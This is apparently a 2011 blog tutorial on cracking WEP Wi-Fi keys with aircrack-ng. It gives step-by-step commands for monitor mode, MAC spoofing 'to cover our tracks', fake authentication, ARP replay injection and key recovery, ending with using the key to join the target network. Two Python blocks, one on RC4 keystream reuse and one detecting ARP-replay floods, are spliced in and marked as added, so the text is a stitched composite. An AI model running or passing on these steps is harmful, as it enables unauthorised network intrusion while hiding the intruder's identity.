Saturday, May 28, 2011

The Art Of Cracking WEP


#Notes-

-->Click On Images To See Them Larger

-->My target AP, output, data, and interfaces may or may not be the same as yours. Replace my command line parameters/info with your own.


Hello, and welcome to my WEP cracking guide. In this guide, I will teach you how to crack WEP implementing Open System authentication. To do this, we will be using a tool, or tool suite, called aircrack-ng. Aircrack-ng has a whole array of tools and scripts to be used for wireless hacking, and every penetration tester should have this in their hacking arsenal. If you don't, be sure to get it at-


http://www.aircrack-ng.org/

I will not go over the entire history of WEP, but let me just say a couple of things about it. First of all, WEP stands for Wired Equivalent Privacy. It uses the RC4 stream cipher, and a stream cipher's keystream must never be used more than once. To get a fresh keystream for each packet, WEP concatenates a 24-bit initialization vector (IV) with the secret key to form the per-packet RC4 key, and sends the IV in the clear. But a 24-bit IV gives only 2^24 (about 16.7 million) possible values, so after around 5,000 packets an IV, and with it the keystream, can already repeat. That is not long enough to ensure security on a large network, or a network with lots of traffic. We, as the hacker, must prove that this is a big ol' fuck up, and inform the guilty party to change to WPA (WiFi Protected Access) as soon as possible for the sake of security.
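To make the two claims above concrete (a repeated IV means a repeated keystream, and 24 bits is small enough that a repeat comes fast), here is an added example that is not part of the original post and not code from aircrack-ng. It implements plain RC4 and the WEP per-packet key construction (IV || secret key, with the CRC-32 ICV left out since it does not affect the point), then shows that two frames sent under the same IV leak the XOR of their plaintexts, and computes the birthday-bound probability of an IV repeat after N packets. The key, IVs and plaintexts are constructed sample values.

```python
"""Why WEP's 24-bit IV is too short (added example, not from the original guide)."""
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm, then `length` bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style encryption: the per-packet RC4 key is IV || secret key.
    The IV travels in the clear in the frame header; XOR makes this its own inverse."""
    if len(iv) != IV_BITS // 8:
        raise ValueError("WEP IV must be exactly 24 bits")
    return xor_bytes(plaintext, rc4_keystream(iv + secret_key, len(plaintext)))


def keystream_reuse_leak(secret_key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """Encrypt two plaintexts under the same IV and return C1 xor C2.
    Because both used the same keystream, this equals P1 xor P2: the secret key cancels out,
    which is exactly what makes IV reuse fatal for a stream cipher."""
    c1 = wep_encrypt(secret_key, iv, p1)
    c2 = wep_encrypt(secret_key, iv, p2)
    return xor_bytes(c1, c2)


def iv_collision_probability(n_packets: int, iv_bits: int = IV_BITS) -> float:
    """Probability that at least two of n randomly chosen IVs coincide (birthday problem).
    Computed exactly as 1 - prod_{i<n} (1 - i / 2^bits), in log space to avoid underflow."""
    space = 1 << iv_bits
    if n_packets > space:
        return 1.0
    log_no_collision = 0.0
    for i in range(n_packets):
        log_no_collision += math.log1p(-i / space)
    return 1.0 - math.exp(log_no_collision)


def packets_for_collision_probability(p: float, iv_bits: int = IV_BITS) -> int:
    """Approximate packet count after which an IV repeat has probability p:
    the birthday estimate n ~ sqrt(2 * 2^bits * ln(1 / (1 - p)))."""
    space = 1 << iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - p))))


if __name__ == "__main__":
    # Constructed sample values; any real WEP key and IV behave the same way.
    key = bytes.fromhex("0102030405")
    iv = bytes.fromhex("aabbcc")
    p1 = b"ARP request from station A"
    p2 = b"ARP request from station B"
    print("C1 xor C2 == P1 xor P2:", keystream_reuse_leak(key, iv, p1, p2) == xor_bytes(p1, p2))
    print("P(IV repeat after 5000 packets) = %.3f" % iv_collision_probability(5000))
    print("packets for a 50%% chance of an IV repeat = %d" % packets_for_collision_probability(0.5))
```

Run as a script it prints that the XOR of the two ciphertexts equals the XOR of the two plaintexts, and that the birthday bound puts a 50% chance of an IV repeat at a little under 5,000 packets, which is where the "around 5,000 packets" figure above comes from. The same functions work for any IV width, so you can pass `iv_bits=48` or larger to see why later protocols use much longer per-packet nonces.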

But how do we exploit this vulnerability? We open up a Terminal window, and type-



airmon-ng



Let's look at the output from the above command-

[screenshot of airmon-ng output, not reproduced here]
From this image I am able to see that my interface is wlan0. So now I will put that interface into monitor mode and see which interface monitor mode is enabled on-



airmon-ng start wlan0


Here is the output from this command-

[screenshot of airmon-ng start wlan0 output, not reproduced here]
According to the output, monitor mode is enabled on mon0. This is the monitor-mode interface we will use for everything that follows, and while we're at it, we are also going to change the MAC address of this interface to cover our tracks. To do all of this, just type-


ifconfig mon0 down


Then type-



macchanger --mac 00:11:22:33:44:55 mon0


And finally-


ifconfig mon0 up



Here is what the output of all of these commands will look like-

[screenshot of the ifconfig and macchanger output, not reproduced here]
As you can see, we have faked our MAC address, and we are ready to scan for access points (APs) on our monitor-mode interface. To do this, type-


airodump-ng mon0


Here is the output for this command-

[screenshot of airodump-ng mon0 output, not reproduced here]
Let's look at the output. We have found an AP with the network name (ESSID) bightire. It uses WEP for its encryption/cipher, and since the AUTH column is blank, it is using Open System authentication. It is also on channel 11. But this is just a general scan. Now we have to filter, or "single out", our target AP. To do this, we will specify the details of this AP in airodump-ng-


airodump-ng -c 11 -w wep_crack --bssid 00:23:69:C5:8F:D0 mon0

In this command, we are running airodump-ng and specifying that the AP is on channel 11 (-c 11). We are writing all of our collected data to files named wep_crack (-w), and specifying the BSSID of the AP. And finally, we are doing all of this on the mon0 interface. Here is the output-

[screenshot of the filtered airodump-ng output, not reproduced here]
LEAVE THIS WINDOW OPEN WITH THE COMMAND RUNNING. We need to collect initialization vectors (the #Data column), so that we can crack the WEP key. Now we will open a new window (Ctrl-Shift-T) and fake association and authentication with the AP. We are able to do this because the AP uses Open System authentication, which accepts any station that asks. After you have your new window open, type-



aireplay-ng -1 0 -a 00:23:69:C5:8F:D0 -e bightire -h 00:11:22:33:44:55 mon0


This is what the output of this command looks like-

[screenshot of aireplay-ng -1 fake authentication output, not reproduced here]
Now that we are authenticated and associated, we can replay ARP packets to collect IVs (initialization vectors) a whole lot faster, since every replayed request makes the AP send out a freshly encrypted frame with a new IV. To do this, type-



aireplay-ng -3 -b 00:23:69:C5:8F:D0 -e bightire -h 00:11:22:33:44:55 mon0

Here is the output from my command, which is right below the previous command-

[screenshot of aireplay-ng -3 ARP replay output, not reproduced here]
DO NOT STOP THIS COMMAND.
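The replay step above is also what makes this activity easy to spot from the defender's side: one captured ARP request is re-injected over and over, so a monitor-mode sensor sees a burst of identically sized data frames from a single station at a rate no real client produces. Here is an added detection example that is not part of the original post and not code from aircrack-ng. The record format, the sample capture and the rate threshold are constructed assumptions for this example; a real wireless IDS would fill the records from its own frame parser and tune the threshold to its environment.

```python
"""Flagging an ARP-replay IV flood from per-frame metadata (added example, not from the guide)."""
from collections import Counter, defaultdict

# Assumed threshold for this example: an ordinary client may retransmit a few identical
# frames per second; hundreds per second of one exact length is replay, not traffic.
REPLAY_RATE_THRESHOLD = 100   # identical-length frames from one station per 1-second bucket


def build_sample_capture():
    """Constructed capture: (seconds since start, source MAC, frame length in bytes).
    One ordinary client sends mixed-size frames; one station replays a 68-byte frame
    (roughly the size of an encapsulated ARP request) 400 times a second."""
    frames = []
    for sec in range(6):
        for k, length in enumerate((1514, 342, 98, 66)):
            frames.append((sec + k * 0.2, "a4:5e:60:11:22:33", length))   # constructed MAC
    for sec in range(2, 6):
        for k in range(400):
            frames.append((sec + k / 400.0, "00:11:22:33:44:55", 68))    # spoofed MAC from the guide
    return frames


def detect_arp_replay(frames, threshold=REPLAY_RATE_THRESHOLD):
    """Return {src_mac: (frame_len, peak_count)} for every station whose count of
    identical-length frames in some 1-second bucket exceeds the threshold."""
    buckets = defaultdict(Counter)            # (src_mac, whole second) -> Counter(frame_len)
    for ts, src, length in frames:
        buckets[(src, int(ts))][length] += 1
    flagged = {}
    for (src, _sec), counter in buckets.items():
        length, count = counter.most_common(1)[0]
        if count > threshold and count > flagged.get(src, (None, 0))[1]:
            flagged[src] = (length, count)    # keep the worst second per station
    return flagged


if __name__ == "__main__":
    for mac, (length, count) in detect_arp_replay(build_sample_capture()).items():
        print(f"possible ARP replay from {mac}: {count} frames of {length} bytes in one second")
```

The check keys on frame length rather than content because the payload is WEP-encrypted and the sensor cannot read it; the IV in the header changes on the AP's responses, but the injected request itself is byte-for-byte identical, which is why a size-and-rate heuristic is enough. Pairing this with a check for a station that authenticates but never sends real data (the fake-authentication step) cuts down on false positives from chatty but legitimate clients.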

Now we wait until we have anywhere from 10,000 to half a million IVs (DAMN!). So go do something (this may include smoking a cigarette, drinking a Monster, or going to the bathroom). Come back in a minute.....

Great, you're back! Now it's time to crack our WEP key. Open up your third and final Terminal window, and type-


aircrack-ng --bssid 00:23:69:C5:8F:D0 wep_crack-01.cap

Here is my output-

[screenshot of aircrack-ng output ending in KEY FOUND!, not reproduced here]
At the bottom of this output, you can clearly see the WEP key, marked by (KEY FOUND!). Inside the "[ ]" is the WEP key. Remove the colons (:) from it and enter it into your network manager to gain access to your target AP.

Happy Hacking! :-)

1 comment:

  1. give some explanation about all tools and some tips that will be more help to all

    thank you friend
